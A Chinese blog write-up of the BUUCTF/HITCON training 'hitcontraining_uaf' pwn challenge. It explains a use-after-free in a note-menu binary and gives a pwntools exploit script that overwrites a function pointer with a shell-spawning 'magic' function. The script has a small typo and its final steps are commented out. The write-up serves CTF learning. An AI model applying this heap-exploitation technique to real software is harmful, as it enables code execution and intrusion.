【pwn】hitcontraining_uaf --堆利用之uaf

最新推荐文章于 2024-03-08 21:05:14 发布
最新推荐文章于 2024-03-08 21:05:14 发布
阅读量409 收藏 8
点赞数 6
文章标签: python 开发语言 安全 c语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/135559137
版权

先检查程序的保护情况

32位程序,堆栈不可执行

看ida

经典的菜单题,根据题目的uaf,判断该题有uaf漏洞,看一下delete函数

两次free没置空指针,确实存在uaf漏洞,再看一下add函数和print函数

add函数这里,就是创建了两个堆块,第一个堆块八字节数据中,前四个字节存着puts函数地址,后四个字节存着新建堆块的地址,这个堆块才是我们可以使用和操纵的地方,再来看一下print函数

print函数这里根据索引用puts函数输入我们写入堆块的内容,由于前面的delete函数中的指针没有置空,即使free掉第一个堆块,通过索引我们还是可以打印第一个堆块的内容

这里的利用思路是先创建出两个堆块,然后再删除这两个堆块

add(16,b'aaaa')

add(16,b'bbbb')

delete(0)

delete(1)

我们debug看一下

可以发现,实际上是创建了四个堆块,跟上面的分析一样,再来看一下fastbins

也就是说我们再申请一个0x8大小的堆块的话,其实就是申请了两个0x8的堆块,这个过程为先申请了0x9c03028地址的堆块,然后再申请0x9c03000地址的堆块,写入magic函数地址,会发现,这其实就是哦我们上面第一个堆块存puts函数的地址,现在变成了magic函数地址,那我再print(0)时就会去执行magic函数

magic函数如下:

完整exp:

from pwn import *

context(os='linux',arch='i386',log_level='debug')

#io=remote("node5.buuoj.cn",27156)

ifo=process("./pwn")

magic_addr=0x8048945

def debug():

    gdb.attach(io)

    pause()

def add(size,content):

    io.recvuntil(b"Your choice :")

    io.sendline(b"1")

    io.recvuntil(b"Note size :")

    io.sendline(str(size))

    io.recvuntil(b"Content :")

    io.sendline(content)

def printt(index):

    io.recvuntil(b"Your choice :")

    io.sendline(b"3")

    io.sendline(str(index))

def delete(index):

    io.recvuntil(b"Your choice :")

    io.sendline(b"2")

    io.recvuntil(b"Index :")

    io.sendline(str(index))

add(16,b'aaaa')

add(16,b'bbbb')

delete(0)

delete(1)

#add(8,p32(magic_addr))

debug()

#printt(0)

#io.interactive()

GGb0mb
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn入门08---利用uaf
weixin_45943522的博客
02-21 1430
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1601
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
[CTF]PWN----UAF漏洞
最新发布
2301_79880752的博客
03-08 955
UAF即Use After Free简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况。。而我们一般所指的漏洞主要是后两种。此外,
hitcontraining_uaf
m0_62326489的博客
07-11 254
题目的一点自己理解
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 224
会把指针块1重新分配给我们,context块会把指针块0分配给我们(因为我们申请一个块实际上是申请两个块(一个指针块,一个context块))程序是先申请一个指针块,这个指针块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的块内容指针就是相当于这样。3.打印块内容,这段代码会把指针块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放块,这个操作,在释放块之后,并未把指针置零,所以存在uaf漏洞。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 300
这道题可以用来当做的入门题来做 开了NX 这是的菜单;
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1314
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
linux_pwn(1)--uaf
azraelxuemo的博客
03-04 1182
文章目录What is uafpwn题例题add函数show函数delete函数开始做题准备框架调试attackexp总结 What is uaf use after free 一般可能会有以下的场景 ptr=malloc(0x10) free(ptr) ptr-> 可能写代码不会出现这样的明显错误,但如果多文件呢?可能你这个地方释放了,其他地方还存在引用 所以项目中记住,free之后立刻ptr=NULL pwn题 在ctf里面,一般uaf出题模式就是 在bss开辟了区域,保存了每个heap的地址,
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 314
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
hitcontrainingUAF之我见
TedLau的博客
06-16 263
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
realloc函数UAF利用|攻防世界pwn进阶区supermarket
Kni9hT's Blog
03-21 862
文章目录思路0x00.tar解压0x01.查看保护0x02.查看程序并调试0x03.漏洞分析realloc函数详解0x04.利用思路利用过程exp编写 思路 0x00.tar解压 下载获得压缩包文件,解压之后放进ubuntu中发现还是一个tar格式压缩包。 tar -xf filename 附:linux下tar命令详解 解压得到一个libc.so.6的库和一个可执行文件 0x01.查看保护 ...
ack_PCS = bit64 << (slave_W-1);
07-28
- *1* [逆向-还原代码之bit-order (Arm 64)](https://blog.csdn.net/xiaozhiwise/article/details/128399013)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值